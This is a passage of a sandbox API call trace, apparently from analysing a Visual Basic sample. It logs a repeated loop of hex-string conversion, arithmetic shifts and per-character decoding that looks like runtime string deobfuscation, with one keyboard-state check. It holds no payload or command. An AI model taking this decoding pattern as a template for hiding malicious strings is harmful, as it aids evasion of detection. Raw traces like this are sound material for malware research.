dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.059] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.059] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.059] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.059] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.059] GetUserDefaultLCID () returned 0x409 [0175.059] malloc (_Size=0xa0) returned 0x11f50080 [0175.059] free (_Block=0x11f50080) [0175.060] VarBstrCat (in: bstrLeft="&H", bstrRight="ca", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.060] GetUserDefaultLCID () returned 0x409 [0175.060] VarI2FromStr (in: strIn="&Hca", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.060] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.060] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.060] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.060] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.060] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.060] GetUserDefaultLCID () returned 0x409 [0175.060] malloc (_Size=0xa0) returned 0x11f50080 [0175.061] free (_Block=0x11f50080) [0175.061] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.061] GetUserDefaultLCID () returned 0x409 [0175.061] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.061] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.061] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.061] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.061] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.061] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.061] GetUserDefaultLCID () returned 0x409 [0175.062] malloc (_Size=0xa0) returned 0x11f50080 [0175.062] free (_Block=0x11f50080) [0175.062] VarBstrCat (in: bstrLeft="&H", bstrRight="ba", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.062] GetUserDefaultLCID () returned 0x409 [0175.062] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.062] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0175.062] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.062] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.063] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.063] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.063] GetUserDefaultLCID () returned 0x409 [0175.063] malloc (_Size=0xa0) returned 0x11f50080 [0175.063] free (_Block=0x11f50080) [0175.063] VarBstrCat (in: bstrLeft="&H", bstrRight="c3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.063] GetUserDefaultLCID () returned 0x409 [0175.063] VarI2FromStr (in: strIn="&Hc3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.063] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0175.064] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.064] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.064] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.064] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.064] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.064] GetUserDefaultLCID () returned 0x409 [0175.064] malloc (_Size=0xa0) returned 0x11f50080 [0175.064] free (_Block=0x11f50080) [0175.064] VarBstrCat (in: bstrLeft="&H", bstrRight="b5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.064] GetUserDefaultLCID () returned 0x409 [0175.064] VarI2FromStr (in: strIn="&Hb5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.065] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0175.065] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.065] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.065] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.065] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.065] GetUserDefaultLCID () returned 0x409 [0175.065] malloc (_Size=0xa0) returned 0x11f50080 [0175.065] free (_Block=0x11f50080) [0175.066] VarBstrCat (in: bstrLeft="&H", bstrRight="bf", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.066] GetUserDefaultLCID () returned 0x409 [0175.066] VarI2FromStr (in: strIn="&Hbf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.066] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="Q") returned 1 [0175.066] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.066] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.066] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.066] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.066] GetUserDefaultLCID () returned 0x409 [0175.066] malloc (_Size=0xa0) returned 0x11f50080 [0175.066] free (_Block=0x11f50080) [0175.067] VarBstrCat (in: bstrLeft="&H", bstrRight="8a", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.067] GetUserDefaultLCID () returned 0x409 [0175.067] VarI2FromStr (in: strIn="&H8a", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.067] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.067] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.067] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.067] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.067] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.067] GetUserDefaultLCID () returned 0x409 [0175.067] malloc (_Size=0xa0) returned 0x11f50080 [0175.068] free (_Block=0x11f50080) [0175.068] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.068] GetUserDefaultLCID () returned 0x409 [0175.068] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.068] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0175.068] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.068] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.068] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.068] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.069] GetUserDefaultLCID () returned 0x409 [0175.069] malloc (_Size=0xa0) returned 0x11f50080 [0175.069] free (_Block=0x11f50080) [0175.069] VarBstrCat (in: bstrLeft="&H", bstrRight="a0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.069] GetUserDefaultLCID () returned 0x409 [0175.069] VarI2FromStr (in: strIn="&Ha0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.069] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="J") returned 1 [0175.069] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.070] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.070] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.070] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.070] GetUserDefaultLCID () returned 0x409 [0175.070] malloc (_Size=0xa0) returned 0x11f50080 [0175.070] free (_Block=0x11f50080) [0175.070] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.070] GetUserDefaultLCID () returned 0x409 [0175.070] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.070] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.071] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.071] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.071] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.071] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.071] GetUserDefaultLCID () returned 0x409 [0175.071] malloc (_Size=0xa0) returned 0x11f50080 [0175.071] free (_Block=0x11f50080) [0175.071] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.071] GetUserDefaultLCID () returned 0x409 [0175.071] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.072] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.072] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.072] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.072] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.072] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.072] GetUserDefaultLCID () returned 0x409 [0175.072] malloc (_Size=0xa0) returned 0x11f50080 [0175.072] free (_Block=0x11f50080) [0175.072] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.073] GetUserDefaultLCID () returned 0x409 [0175.073] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.073] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.073] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.073] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.073] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.073] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.073] GetUserDefaultLCID () returned 0x409 [0175.073] malloc (_Size=0xa0) returned 0x11f50080 [0175.073] free (_Block=0x11f50080) [0175.074] VarBstrCat (in: bstrLeft="&H", bstrRight="b1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.074] GetUserDefaultLCID () returned 0x409 [0175.074] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.074] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.074] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.074] GetAsyncKeyState (vKey=27) returned 0 [0175.074] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.075] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.075] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.075] GetUserDefaultLCID () returned 0x409 [0175.075] malloc (_Size=0xa0) returned 0x11f50080 [0175.075] free (_Block=0x11f50080) [0175.075] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.075] GetUserDefaultLCID () returned 0x409 [0175.075] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.075] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.076] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.076] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.076] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.076] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.076] GetUserDefaultLCID () returned 0x409 [0175.076] malloc (_Size=0xa0) returned 0x11f50080 [0175.076] free (_Block=0x11f50080) [0175.076] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.076] GetUserDefaultLCID () returned 0x409 [0175.076] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.077] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.077] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.077] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.077] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.077] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.077] GetUserDefaultLCID () returned 0x409 [0175.077] malloc (_Size=0xa0) returned 0x11f50080 [0175.077] free (_Block=0x11f50080) [0175.077] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.077] GetUserDefaultLCID () returned 0x409 [0175.077] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.078] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.078] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.078] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.078] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.078] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.078] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) 